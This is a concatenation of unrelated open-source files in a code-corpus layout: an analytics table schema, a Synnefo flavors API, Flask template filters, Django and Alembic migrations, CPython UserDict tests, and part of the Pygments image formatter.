Column('inventory_inventoryChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryChannel'),
Column('inventory_inventoryName', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryName'),
Column('inventory_inventorySource', DataType.VARCHAR, length=50, path='owen.context.inventory[0].inventorySource'),
Column('inventory_inventoryType', DataType.VARCHAR, length=25, path='owen.context.inventory[0].inventoryType'),
Column('inventory_inventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].inventoryUuid'),
Column('inventory_lastVerifiedDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].lastVerifiedDate'),
Column('inventory_monetizableFlag', DataType.BOOLEAN, path='owen.context.inventory[0].monetizableFlag'),
Column('inventory_noVotes', DataType.INT, path='owen.context.inventory[0].noVotes'),
Column('inventory_onlineType', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].onlineType'),
Column('inventory_originalPrice', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].originalPrice'),
Column('inventory_outRedirectUrl', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outRedirectUrl'),
Column('inventory_outclickUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].outclickUuid'),
Column('inventory_parentInventoryUuid', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].parentInventoryUuid'),
Column('inventory_personalizationFlag', DataType.BOOLEAN, path='owen.context.inventory[0].personalizationFlag'),
Column('inventory_position', DataType.INT, path='owen.context.inventory[0].position'),
Column('inventory_proximity', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].proximity'),
Column('inventory_proximityUnit', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].proximityUnit'),
Column('inventory_recommendedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].recommendedFlag'),
Column('inventory_redemptionChannel', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].redemptionChannel'),
Column('inventory_retailCategory', DataType.VARCHAR, length=75, path='owen.context.inventory[0].retailCategory'),
Column('inventory_savedFlag', DataType.BOOLEAN, path='owen.context.inventory[0].savedFlag'),
Column('inventory_siteUuid', DataType.VARCHAR, length=26, path='owen.context.inventory[0].siteUuid'),
Column('inventory_startDate', DataType.VARCHAR, length=2048, path='owen.context.inventory[0].startDate'),
Column('inventory_successPercentage', DataType.NUMERIC, precision=18, scale=4, path='owen.context.inventory[0].successPercentage'),
Column('inventory_usedByCount', DataType.INT, path='owen.context.inventory[0].usedByCount'),
Column('inventory_yesVotes', DataType.INT, path='owen.context.inventory[0].yesVotes'),
Column('ipAddress', DataType.VARCHAR, length=45, path='owen.context.ipAddress'),
Column('language', DataType.VARCHAR, length=6, path='owen.context.language'),
Column('latitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.latitude'),
Column('locationEnabledFlag', DataType.BOOLEAN, path='owen.context.locationEnabledFlag'),
Column('loggedInFlag', DataType.BOOLEAN, path='owen.context.loggedInFlag'),
Column('longitude', DataType.NUMERIC, precision=18, scale=4, path='owen.context.longitude'),
Column('macAddress', DataType.VARCHAR, length=2048, path='owen.context.macAddress'),
Column('marketing_adGroup', DataType.VARCHAR, length=2048, path='owen.context.marketing.adGroup'),
Column('marketing_campaign', DataType.VARCHAR, length=50, path='owen.context.marketing.campaign'),
Column('marketing_campaignSendCount', DataType.INT, path='owen.context.marketing.campaignSendCount'),
Column('marketing_campaignUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.campaignUuid'),
Column('marketing_cdRank', DataType.INT, path='owen.context.marketing.cdRank'),
Column('marketing_channel', DataType.VARCHAR, length=50, path='owen.context.marketing.channel'),
Column('marketing_content', DataType.VARCHAR, length=2048, path='owen.context.marketing.content'),
Column('marketing_medium', DataType.VARCHAR, length=50, path='owen.context.marketing.medium'),
Column('marketing_notificationUuid', DataType.VARCHAR, length=2048, path='owen.context.marketing.notificationUuid'),
Column('marketing_source', DataType.VARCHAR, length=100, path='owen.context.marketing.source'),
Column('marketing_term', DataType.VARCHAR, length=2048, path='owen.context.marketing.term'),
Column('marketing_vendor', DataType.VARCHAR, length=25, path='owen.context.marketing.vendor'),
Column('mobileDeviceMake', DataType.VARCHAR, length=25, path='owen.context.mobileDeviceMake'),
Column('mobileDeviceModel', DataType.VARCHAR, length=50, path='owen.context.mobileDeviceModel'),
Column('notificationEnabledFlag', DataType.BOOLEAN, path='owen.context.notificationEnabledFlag'),
Column('osFamily', DataType.VARCHAR, length=25, path='owen.context.osFamily'),
Column('osName', DataType.VARCHAR, length=2048, path='owen.context.osName'),
Column('osVersion', DataType.VARCHAR, length=2048, path='owen.context.osVersion'),
Column('pageName', DataType.VARCHAR, length=2048, path='owen.context.pageName'),
Column('pageType', DataType.VARCHAR, length=100, path='owen.context.pageType'),
Column('partialSearchTerm', DataType.VARCHAR, length=2048, path='owen.context.partialSearchTerm'),
Column('personalizationFlag', DataType.BOOLEAN, path='owen.context.personalizationFlag'),
Column('previousPageName', DataType.VARCHAR, length=2048, path='owen.context.previousPageName'),
Column('previousViewInstanceUuid', DataType.VARCHAR, length=2048, path='owen.context.previousViewInstanceUuid'),
Column('promptName', DataType.VARCHAR, length=2048, path='owen.context.promptName'),
Column('propertyName', DataType.VARCHAR, length=20, path='owen.context.propertyName'),
Column('referrer', DataType.VARCHAR, length=2048, path='owen.context.referrer'),
Column('region', DataType.VARCHAR, length=25, path='owen.context.region'),
Column('screenHeight', DataType.INT, path='owen.context.screenHeight'),
Column('screenWidth', DataType.INT, path='owen.context.screenWidth'),
Column('session', DataType.VARCHAR, length=2048, path='owen.context.session'),
Column('test_testUuid', DataType.VARCHAR, length=26, path='owen.context.test.testUuid'),
Column('udid', DataType.VARCHAR, length=40, path='owen.context.udid'),
Column('userAgent', DataType.VARCHAR, length=2048, path='owen.context.userAgent'),
Column('userQualifier', DataType.VARCHAR, length=26, path='owen.context.userQualifier'),
Column('userUuid', DataType.VARCHAR, length=2048, path='owen.context.userUuid'),
Column('vendorObject', DataType.VARCHAR, length=512, path='owen.context.vendor'),
Column('viewInstanceUuid', DataType.VARCHAR, length=128, path='owen.context.viewInstanceUuid'),
Column('eventAction', DataType.VARCHAR, length=2048, path='owen.event.eventAction'),
Column('eventCategory', DataType.VARCHAR, length=25, path='owen.event.eventCategory'),
Column('eventInstanceUuid', DataType.VARCHAR, length=26, path='owen.event.eventInstanceUuid'),
Column('eventName', DataType.VARCHAR, length=50, path='owen.event.eventName'),
Column('eventPlatform', DataType.VARCHAR, length=25, path='owen.event.eventPlatform'),
Column('eventPlatformVersion', DataType.VARCHAR, length=25, path='owen.event.eventPlatformVersion'),
Column('eventTarget', DataType.VARCHAR, length=2048, path='owen.event.eventTarget'),
Column('eventVersion', DataType.VARCHAR, length=25, path='owen.event.eventVersion'),
Column('eventTimestamp', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='owen.event.eventTimestamp'),
Column('derivedEventInstanceId', DataType.VARCHAR, length=64, path='metadata.derivedEventInstanceId'),
Column('owenProcessed', DataType.DATETIME, date_pattern="yyyy-MM-dd'T'HH:mm:ss'Z'", path='metadata.analyticsTopologyFinishTime'),
],
))))
print 'created dataset: %s' % dataset.id
| mit |
AthinaB/synnefo | snf-cyclades-app/synnefo/api/flavors.py | 9 | 3419 | # Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from logging import getLogger
from django.conf.urls import patterns
from django.http import HttpResponse
from django.template.loader import render_to_string
from django.utils import simplejson as json
from snf_django.lib import api
from synnefo.api import util
from synnefo.db.models import Flavor
log = getLogger('synnefo.api')
urlpatterns = patterns(
'synnefo.api.flavors',
(r'^(?:/|.json|.xml)?$', 'list_flavors'),
(r'^/detail(?:.json|.xml)?$', 'list_flavors', {'detail': True}),
(r'^/(\d+)(?:.json|.xml)?$', 'get_flavor_details'),
)
def flavor_to_dict(flavor, detail=True):
d = {'id': flavor.id, 'name': flavor.name}
d['links'] = util.flavor_to_links(flavor.id)
if detail:
d['ram'] = flavor.ram
d['disk'] = flavor.disk
d['vcpus'] = flavor.cpu
d['SNF:disk_template'] = flavor.volume_type.disk_template
d['SNF:volume_type'] = flavor.volume_type_id
d['SNF:allow_create'] = flavor.allow_create
return d
@api.api_method(http_method='GET', user_required=True, logger=log)
def list_flavors(request, detail=False):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# overLimit (413)
log.debug('list_flavors detail=%s', detail)
active_flavors = Flavor.objects.select_related("volume_type")\
.exclude(deleted=True)
flavors = [flavor_to_dict(flavor, detail)
for flavor in active_flavors.order_by('id')]
if request.serialization == 'xml':
data = render_to_string('list_flavors.xml', {
'flavors': flavors,
'detail': detail})
else:
data = json.dumps({'flavors': flavors})
return HttpResponse(data, status=200)
@api.api_method(http_method='GET', user_required=True, logger=log)
def get_flavor_details(request, flavor_id):
# Normal Response Codes: 200, 203
# Error Response Codes: computeFault (400, 500),
# serviceUnavailable (503),
# unauthorized (401),
# badRequest (400),
# itemNotFound (404),
# overLimit (413)
log.debug('get_flavor_details %s', flavor_id)
flavor = util.get_flavor(flavor_id, include_deleted=True)
flavordict = flavor_to_dict(flavor, detail=True)
if request.serialization == 'xml':
data = render_to_string('flavor.xml', {'flavor': flavordict})
else:
data = json.dumps({'flavor': flavordict})
return HttpResponse(data, status=200)
| gpl-3.0 |
Doteveryone/BetterJobAdverts | jobcert/filters.py | 1 | 1556 | from jobcert import app
@app.template_filter('readability_words')
def readability_words_filter(s):
score = int(s)
if score in range(90, 100):
return "Very Easy"
elif score in range(80, 89):
return "Easy"
elif score in range(70, 79):
return "Fairly Easy"
elif score in range (60, 69):
return "Standard"
elif score in range (50, 59):
return "Fairly Difficult"
elif score in range (30, 49):
return "Difficult"
else:
return "Very Confusing"
@app.template_filter('trafficlight_status')
def trafficlight_status_filter(s):
if s == 'clear':
return "success"
if s == 'unclear':
return "warning"
else:
return "alert"
@app.template_filter('boolean_status')
def boolean_status_filter(s):
if bool(s):
return "success"
else:
return "alert"
@app.template_filter('format_status')
def format_status_filter(s):
if s == 'yes':
return "success"
if s == 'incomplete':
return "warning"
else:
return "alert"
@app.template_filter('readability_status')
def readability_status_filter(s):
score = int(s)
if score in range(60, 100):
return "success"
elif score in range (30, 59):
return "warning"
else:
return "alert"
@app.template_filter('gender_coded_status')
def gender_coded_status_filter(s):
if s in ('feminine-coded', 'strongly feminine-coded', 'neutral'):
return "success"
else:
return "warning" | agpl-3.0 |
gwu-libraries/sfm-ui | sfm/ui/migrations/0021_auto_20180712_1310.py | 2 | 10258 | # Generated by Django 2.0.7 on 2018-07-12 17:10
import django.contrib.auth.validators
from django.db import migrations, models
import jsonfield.fields
class Migration(migrations.Migration):
dependencies = [
('ui', '0020_auto_20180608_1144'),
]
operations = [
migrations.AddField(
model_name='historicalcollection',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcollectionset',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalcredential',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='historicalseed',
name='history_change_reason',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='collection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='collection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='collection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='collection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='collection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='collection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='collectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='credential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='credential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='export',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='export_format',
field=models.CharField(choices=[('xlsx', 'Excel (XLSX)'), ('csv', 'Comma separated values (CSV)'), ('tsv', 'Tab separated values (TSV)'), ('json_full', 'Full JSON'), ('json', 'JSON of limited fields'), ('dehydrate', 'Text file of identifiers (dehydrate)')], default='xlsx', max_length=10),
),
migrations.AlterField(
model_name='export',
name='export_segment_size',
field=models.BigIntegerField(blank=True, choices=[(100000, '100,000'), (250000, '250,000'), (500000, '500,000'), (100000, '1,000,000'), (None, 'Single file'), (100, '100')], default=250000, null=True),
),
migrations.AlterField(
model_name='export',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='export',
name='status',
field=models.CharField(choices=[('not requested', 'Not requested'), ('requested', 'Requested'), ('running', 'Running'), ('completed success', 'Success'), ('completed failure', 'Failure')], default='not requested', max_length=20),
),
migrations.AlterField(
model_name='export',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='errors',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='infos',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='harvest',
name='status',
field=models.CharField(choices=[('requested', 'Requested'), ('completed success', 'Success'), ('completed failure', 'Completed with errors'), ('running', 'Running'), ('stop requested', 'Stop requested'), ('stopping', 'Stopping'), ('voided', 'Voided'), ('skipped', 'Skipped'), ('paused', 'Paused')], default='requested', max_length=20),
),
migrations.AlterField(
model_name='harvest',
name='token_updates',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='uids',
field=jsonfield.fields.JSONField(blank=True, default={}),
),
migrations.AlterField(
model_name='harvest',
name='warnings',
field=jsonfield.fields.JSONField(blank=True, default=[]),
),
migrations.AlterField(
model_name='historicalcollection',
name='end_date',
field=models.DateTimeField(blank=True, help_text='If blank, will continue until stopped.', null=True),
),
migrations.AlterField(
model_name='historicalcollection',
name='harvest_type',
field=models.CharField(choices=[('twitter_user_timeline', 'Twitter user timeline'), ('twitter_search', 'Twitter search'), ('twitter_filter', 'Twitter filter'), ('twitter_sample', 'Twitter sample'), ('tumblr_blog_posts', 'Tumblr blog posts'), ('flickr_user', 'Flickr user'), ('weibo_timeline', 'Weibo timeline')], max_length=255),
),
migrations.AlterField(
model_name='historicalcollection',
name='link',
field=models.CharField(blank=True, max_length=512, verbose_name='Public link'),
),
migrations.AlterField(
model_name='historicalcollection',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection name'),
),
migrations.AlterField(
model_name='historicalcollection',
name='schedule_minutes',
field=models.PositiveIntegerField(choices=[(1, 'One time harvest'), (30, 'Every 30 minutes'), (60, 'Every hour'), (240, 'Every 4 hours'), (720, 'Every 12 hours'), (1440, 'Every day'), (10080, 'Every week'), (40320, 'Every 4 weeks'), (5, 'Every 5 minutes')], default=10080, null=True, verbose_name='schedule'),
),
migrations.AlterField(
model_name='historicalcollection',
name='visibility',
field=models.CharField(choices=[('default', 'Group only'), ('local', 'All other users')], default='default', help_text='Who else can view and export from this collection. Select "All other users" to share with all Social Feed Manager users.', max_length=255),
),
migrations.AlterField(
model_name='historicalcollectionset',
name='name',
field=models.CharField(max_length=255, verbose_name='Collection set name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='name',
field=models.CharField(max_length=255, verbose_name='Credential name'),
),
migrations.AlterField(
model_name='historicalcredential',
name='platform',
field=models.CharField(choices=[('twitter', 'Twitter'), ('flickr', 'Flickr'), ('weibo', 'Weibo'), ('tumblr', 'Tumblr')], help_text='Platform name', max_length=255),
),
migrations.AlterField(
model_name='user',
name='email_frequency',
field=models.CharField(choices=[('daily', 'Daily'), ('weekly', 'Weekly'), ('monthly', 'Monthly'), ('none', 'None')], default='daily', max_length=10),
),
migrations.AlterField(
model_name='user',
name='last_name',
field=models.CharField(blank=True, max_length=150, verbose_name='last name'),
),
migrations.AlterField(
model_name='user',
name='local_id',
field=models.CharField(blank=True, default='', help_text='Local identifier', max_length=255),
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username'),
),
]
| mit |
City-of-Helsinki/kuulemma | kuulemma/migrations/versions/14051cff79e_rename_hearing_section_to_alternative.py | 2 | 4084 | # -*- coding: utf-8 -*-
# Kuulemma
# Copyright (C) 2014, Fast Monkeys Oy
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Rename `hearing_section` to `alternative`"""
# revision identifiers, used by Alembic.
revision = '14051cff79e'
down_revision = '51051f5b195'
from alembic import op
def upgrade():
op.rename_table('hearing_section', 'alternative')
op.rename_table('hearing_section_version', 'alternative_version')
op.alter_column(
'comment',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'image',
'hearing_section_id',
new_column_name='alternative_id'
)
op.alter_column(
'comment_version',
'hearing_section_id',
new_column_name='alternative_id'
)
op.create_index(op.f(
'ix_alternative_version_end_transaction_id'),
'alternative_version',
['end_transaction_id'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_operation_type'),
'alternative_version',
['operation_type'],
unique=False
)
op.create_index(op.f(
'ix_alternative_version_transaction_id'),
'alternative_version',
['transaction_id'],
unique=False
)
op.drop_index(
'ix_hearing_section_version_end_transaction_id',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_operation_type',
table_name='alternative_version'
)
op.drop_index(
'ix_hearing_section_version_transaction_id',
table_name='alternative_version'
)
op.create_index(
op.f('ix_image_alternative_id'),
'image',
['alternative_id'],
unique=False
)
op.drop_index(
'ix_image_hearing_section_id',
table_name='image'
)
def downgrade():
op.drop_index(
op.f('ix_image_alternative_id'),
table_name='image'
)
op.drop_index(
op.f('ix_alternative_version_transaction_id'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_operation_type'),
table_name='alternative_version'
)
op.drop_index(
op.f('ix_alternative_version_end_transaction_id'),
table_name='alternative_version'
)
op.rename_table('alternative', 'hearing_section')
op.rename_table('alternative_version', 'hearing_section_version')
op.alter_column(
'comment',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'image',
'alternative_id',
new_column_name='hearing_section_id'
)
op.alter_column(
'comment_version',
'alternative_id',
new_column_name='hearing_section_id'
)
op.create_index(
'ix_image_hearing_section_id',
'image',
['hearing_section_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_transaction_id',
'hearing_section_version',
['transaction_id'],
unique=False
)
op.create_index(
'ix_hearing_section_version_operation_type',
'hearing_section_version',
['operation_type'],
unique=False
)
op.create_index(
'ix_hearing_section_version_end_transaction_id',
'hearing_section_version',
['end_transaction_id'],
unique=False
)
| agpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_userdict.py | 2 | 6470 | # Check every path through every method of UserDict
from test import support, mapping_tests
import collections
d0 = {}
d1 = {"one": 1}
d2 = {"one": 1, "two": 2}
d3 = {"one": 1, "two": 3, "three": 5}
d4 = {"one": None, "two": None}
d5 = {"one": 1, "two": 1}
class UserDictTest(mapping_tests.TestHashMappingProtocol):
type2test = collections.UserDict
def test_all(self):
# Test constructors
u = collections.UserDict()
u0 = collections.UserDict(d0)
u1 = collections.UserDict(d1)
u2 = collections.UserDict(d2)
uu = collections.UserDict(u)
uu0 = collections.UserDict(u0)
uu1 = collections.UserDict(u1)
uu2 = collections.UserDict(u2)
# keyword arg constructor
self.assertEqual(collections.UserDict(one=1, two=2), d2)
# item sequence constructor
self.assertEqual(collections.UserDict([('one',1), ('two',2)]), d2)
self.assertEqual(collections.UserDict(dict=[('one',1), ('two',2)]), d2)
# both together
self.assertEqual(collections.UserDict([('one',1), ('two',2)], two=3, three=5), d3)
# alternate constructor
self.assertEqual(collections.UserDict.fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict().fromkeys('one two'.split()), d4)
self.assertEqual(collections.UserDict.fromkeys('one two'.split(), 1), d5)
self.assertEqual(collections.UserDict().fromkeys('one two'.split(), 1), d5)
self.assert_(u1.fromkeys('one two'.split()) is not u1)
self.assert_(isinstance(u1.fromkeys('one two'.split()), collections.UserDict))
self.assert_(isinstance(u2.fromkeys('one two'.split()), collections.UserDict))
# Test __repr__
self.assertEqual(str(u0), str(d0))
self.assertEqual(repr(u1), repr(d1))
self.assertEqual(repr(u2), repr(d2))
# Test __cmp__ and __len__
all = [d0, d1, d2, u, u0, u1, u2, uu, uu0, uu1, uu2]
for a in all:
for b in all:
self.assertEqual(a == b, len(a) == len(b))
# Test __getitem__
self.assertEqual(u2["one"], 1)
self.assertRaises(KeyError, u1.__getitem__, "two")
# Test __setitem__
u3 = collections.UserDict(u2)
u3["two"] = 2
u3["three"] = 3
# Test __delitem__
del u3["three"]
self.assertRaises(KeyError, u3.__delitem__, "three")
# Test clear
u3.clear()
self.assertEqual(u3, {})
# Test copy()
u2a = u2.copy()
self.assertEqual(u2a, u2)
u2b = collections.UserDict(x=42, y=23)
u2c = u2b.copy() # making a copy of a UserDict is special cased
self.assertEqual(u2b, u2c)
class MyUserDict(collections.UserDict):
def display(self): print(self)
m2 = MyUserDict(u2)
m2a = m2.copy()
self.assertEqual(m2a, m2)
# SF bug #476616 -- copy() of UserDict subclass shared data
m2['foo'] = 'bar'
self.assertNotEqual(m2a, m2)
# Test keys, items, values
self.assertEqual(u2.keys(), d2.keys())
self.assertEqual(u2.items(), d2.items())
self.assertEqual(list(u2.values()), list(d2.values()))
# Test "in".
for i in u2.keys():
self.assert_(i in u2)
self.assertEqual(i in u1, i in d1)
self.assertEqual(i in u0, i in d0)
# Test update
t = collections.UserDict()
t.update(u2)
self.assertEqual(t, u2)
# Test get
for i in u2.keys():
self.assertEqual(u2.get(i), u2[i])
self.assertEqual(u1.get(i), d1.get(i))
self.assertEqual(u0.get(i), d0.get(i))
# Test "in" iteration.
for i in range(20):
u2[i] = str(i)
ikeys = []
for k in u2:
ikeys.append(k)
keys = u2.keys()
self.assertEqual(set(ikeys), set(keys))
# Test setdefault
t = collections.UserDict()
self.assertEqual(t.setdefault("x", 42), 42)
self.assert_("x" in t)
self.assertEqual(t.setdefault("x", 23), 42)
# Test pop
t = collections.UserDict(x=42)
self.assertEqual(t.pop("x"), 42)
self.assertRaises(KeyError, t.pop, "x")
self.assertEqual(t.pop("x", 1), 1)
t["x"] = 42
self.assertEqual(t.pop("x", 1), 42)
# Test popitem
t = collections.UserDict(x=42)
self.assertEqual(t.popitem(), ("x", 42))
self.assertRaises(KeyError, t.popitem)
def test_missing(self):
# Make sure UserDict doesn't have a __missing__ method
self.assertEqual(hasattr(collections.UserDict, "__missing__"), False)
# Test several cases:
# (D) subclass defines __missing__ method returning a value
# (E) subclass defines __missing__ method raising RuntimeError
# (F) subclass sets __missing__ instance variable (no effect)
# (G) subclass doesn't define __missing__ at a all
class D(collections.UserDict):
def __missing__(self, key):
return 42
d = D({1: 2, 3: 4})
self.assertEqual(d[1], 2)
self.assertEqual(d[3], 4)
self.assert_(2 not in d)
self.assert_(2 not in d.keys())
self.assertEqual(d[2], 42)
class E(collections.UserDict):
def __missing__(self, key):
raise RuntimeError(key)
e = E()
try:
e[42]
except RuntimeError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("e[42] didn't raise RuntimeError")
class F(collections.UserDict):
def __init__(self):
# An instance variable __missing__ should have no effect
self.__missing__ = lambda key: None
collections.UserDict.__init__(self)
f = F()
try:
f[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("f[42] didn't raise KeyError")
class G(collections.UserDict):
pass
g = G()
try:
g[42]
except KeyError as err:
self.assertEqual(err.args, (42,))
else:
self.fail("g[42] didn't raise KeyError")
def test_main():
support.run_unittest(
UserDictTest,
)
if __name__ == "__main__":
test_main()
| mit |
PatKayongo/patkayongo.github.io | node_modules/pygmentize-bundled/vendor/pygments/build-3.3/pygments/formatters/img.py | 94 | 18053 | # -*- coding: utf-8 -*-
"""
pygments.formatters.img
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for Pixmap output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import sys
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt, \
get_list_opt, get_choice_opt
# Import this carefully
try:
from PIL import Image, ImageDraw, ImageFont
pil_available = True
except ImportError:
pil_available = False
try:
import winreg
except ImportError:
_winreg = None
__all__ = ['ImageFormatter', 'GifImageFormatter', 'JpgImageFormatter',
'BmpImageFormatter']
# For some unknown reason every font calls it something different
STYLES = {
'NORMAL': ['', 'Roman', 'Book', 'Normal', 'Regular', 'Medium'],
'ITALIC': ['Oblique', 'Italic'],
'BOLD': ['Bold'],
'BOLDITALIC': ['Bold Oblique', 'Bold Italic'],
}
# A sane default for modern systems
DEFAULT_FONT_NAME_NIX = 'Bitstream Vera Sans Mono'
DEFAULT_FONT_NAME_WIN = 'Courier New'
class PilNotAvailable(ImportError):
"""When Python imaging library is not available"""
class FontNotFound(Exception):
"""When there are no usable fonts specified"""
class FontManager(object):
"""
Manages a set of fonts: normal, italic, bold, etc...
"""
def __init__(self, font_name, font_size=14):
self.font_name = font_name
self.font_size = font_size
self.fonts = {}
self.encoding = None
if sys.platform.startswith('win'):
if not font_name:
self.font_name = DEFAULT_FONT_NAME_WIN
self._create_win()
else:
if not font_name:
self.font_name = DEFAULT_FONT_NAME_NIX
self._create_nix()
def _get_nix_font_path(self, name, style):
from subprocess import getstatusoutput
exit, out = getstatusoutput('fc-list "%s:style=%s" file' %
(name, style))
if not exit:
lines = out.splitlines()
if lines:
path = lines[0].strip().strip(':')
return path
def _create_nix(self):
for name in STYLES['NORMAL']:
path = self._get_nix_font_path(self.font_name, name)
if path is not None:
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
break
else:
raise FontNotFound('No usable fonts named: "%s"' %
self.font_name)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
for stylename in STYLES[style]:
path = self._get_nix_font_path(self.font_name, stylename)
if path is not None:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
break
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
def _lookup_win(self, key, basename, styles, fail=False):
for suffix in ('', ' (TrueType)'):
for style in styles:
try:
valname = '%s%s%s' % (basename, style and ' '+style, suffix)
val, _ = winreg.QueryValueEx(key, valname)
return val
except EnvironmentError:
continue
else:
if fail:
raise FontNotFound('Font %s (%s) not found in registry' %
(basename, styles[0]))
return None
def _create_win(self):
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows NT\CurrentVersion\Fonts')
except EnvironmentError:
try:
key = winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
r'Software\Microsoft\Windows\CurrentVersion\Fonts')
except EnvironmentError:
raise FontNotFound('Can\'t open Windows font registry key')
try:
path = self._lookup_win(key, self.font_name, STYLES['NORMAL'], True)
self.fonts['NORMAL'] = ImageFont.truetype(path, self.font_size)
for style in ('ITALIC', 'BOLD', 'BOLDITALIC'):
path = self._lookup_win(key, self.font_name, STYLES[style])
if path:
self.fonts[style] = ImageFont.truetype(path, self.font_size)
else:
if style == 'BOLDITALIC':
self.fonts[style] = self.fonts['BOLD']
else:
self.fonts[style] = self.fonts['NORMAL']
finally:
winreg.CloseKey(key)
def get_char_size(self):
"""
Get the character size.
"""
return self.fonts['NORMAL'].getsize('M')
def get_font(self, bold, oblique):
"""
Get the font based on bold and italic flags.
"""
if bold and oblique:
return self.fonts['BOLDITALIC']
elif bold:
